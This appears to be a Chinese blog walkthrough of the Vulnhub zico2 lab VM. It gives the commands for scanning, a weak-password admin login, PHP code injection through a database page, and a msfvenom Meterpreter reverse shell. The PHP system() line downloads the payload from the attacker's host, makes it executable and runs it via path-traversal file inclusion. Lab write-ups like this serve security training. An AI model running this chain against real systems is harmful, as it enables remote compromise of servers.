Vulnhub靶机第九关

Vulnhub靶机 zico2
运行环境
本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运
行。
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机说明
本靶机的难度为中等。
本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。
官方提供了一个提示:枚举、枚举、枚举。
不局限与桥接模式,也可以修改为net模式
确定ip后执行
Nmap -A 192.168.238.138 扫描详细信息
在这里插入图片描述
访问这个ip
使用御剑扫描毛都没有,果断放弃
改用dirb
在这里插入图片描述
发现登录页面
在这里插入图片描述
在这里插入图片描述
尝试使用弱密码admin进行登录
登录成功后发现有两条数据
点击浏览进行查看
在这里插入图片描述
发现加密代码
在这里插入图片描述
尝试解密得到:34kroot34 zico zico2215@
在这里插入图片描述
先把账户密码放一边
新建hack.php数据库
在这里插入图片描述
在这里插入图片描述
内容输入<?php phpinfo();?>用于测试,利用文件包含漏洞来访问创建的hack.php
在这里插入图片描述
因为 此版本存在远程代码执行漏洞
所以利用msf生成一个反向壳的shell通过文件包含漏洞执行
生成shell
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell.elf -a x64 --platform linux LHOST=192.168.238.128 LPORT=4444
并将生产是shell.elf cp到tmp下
在这里插入图片描述
监听开启
在这里插入图片描述
然后利用python -m SimpleHTTPServer 80 搭建一个简易的web服务器
在这里插入图片描述
Msf输入 use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.238.128
set LPORT 4444
Run
在这里插入图片描述
新建数据库
输入:<?php system("cd /tmp; wget http://192.168.238.128:80/shell.elf; chmod a+x shell.elf; ./shell.elf"); ?>
在这里插入图片描述
192.168.238.138/view.php?page=…/…/…/…/…/usr/databases/shell.php 访问
在这里插入图片描述
成功拿到shell
在这里插入图片描述
提权部分请参考十四关。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值